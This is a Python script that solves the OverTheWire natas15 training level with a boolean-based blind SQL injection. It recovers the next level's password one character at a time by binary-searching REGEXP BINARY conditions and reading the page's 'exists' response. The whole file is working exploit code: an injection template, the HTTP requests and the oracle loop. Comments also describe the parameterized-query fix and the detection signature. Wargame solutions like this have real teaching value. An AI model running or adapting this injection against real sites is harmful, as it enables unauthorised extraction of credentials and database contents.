import requests
import math
import string
# Boolean-based blind SQL injection probe for the OverTheWire "natas15" level
# (a public training wargame), recovering the natas16 password one character
# at a time. It works only because the target interpolates the submitted
# username into its SQL statement unparameterized and answers differently
# depending on whether a row matched ("exists" in the page). The fix on the
# server side is a parameterized query plus a response that does not reveal
# whether the lookup matched; many requests with REGEXP in a login field are
# the observable signature of this kind of probing.

# Injection template: closes the quoted username, appends a case-sensitive
# (REGEXP BINARY, MySQL) condition on the password column, and comments out
# the rest of the statement. The single %s receives the regex built below.
SQL_INJECTION = 'natas16" AND password REGEXP BINARY "^%s$"; -- '
# HTTP basic-auth credentials for the natas15 page itself (password censored).
auth = ('natas15', '__CENSORED__')
# Candidate alphabet, in the order the binary search indexes it.
characters = string.ascii_lowercase + string.ascii_uppercase + string.digits
total_characters = len(characters)
# Assumed length of the natas16 password; the regex below pins the tail to it.
password_length = 32
# Prefix of the password recovered so far.
matching = ''
while len(matching) < password_length:
    remaining_length = password_length - len(matching)
    # Half-open search window [chars_start, chars_end) over `characters`.
    chars_start = 0
    chars_end = total_characters
    matching_char = ''
    while not matching_char:
        # Upper half-point; `/ 2.0` forces float division under Python 2.
        midpoint = int(math.ceil((chars_end + chars_start) / 2.0))
        # Lower half of the window, tested as a character class.
        chars_to_try = characters[chars_start:midpoint]
        # "<known prefix>[<lower half>]<exactly remaining-1 alphanumerics>"
        password_regex = '%s[%s][a-zA-Z0-9]{%i}' % (matching, chars_to_try, remaining_length - 1)
        print '%s %i-%i (%i)' % (chars_to_try, chars_start, midpoint, chars_end)
        print password_regex
        r = requests.post('http://natas15.natas.labs.overthewire.org/index.php', auth=auth, data={'username': SQL_INJECTION % password_regex })
        # The page text is the oracle: "exists" means the regex matched a row.
        if 'exists' in r.text:
            # Window of one: that character is the answer.
            if (midpoint - chars_start) <= 1:
                matching_char = characters[chars_start]
            chars_end = midpoint
        else:
            # Lower half ruled out; with a one-wide lower half the next
            # character is taken without a confirming request. This assumes
            # every password character is in `characters` — the search is
            # not defined otherwise.
            if (midpoint - chars_start) <= 1:
                matching_char = characters[chars_start+1]
            chars_start = midpoint
    matching = matching + matching_char
    print 'found: %s' % (matching_char)
print 'found password: %s' % matching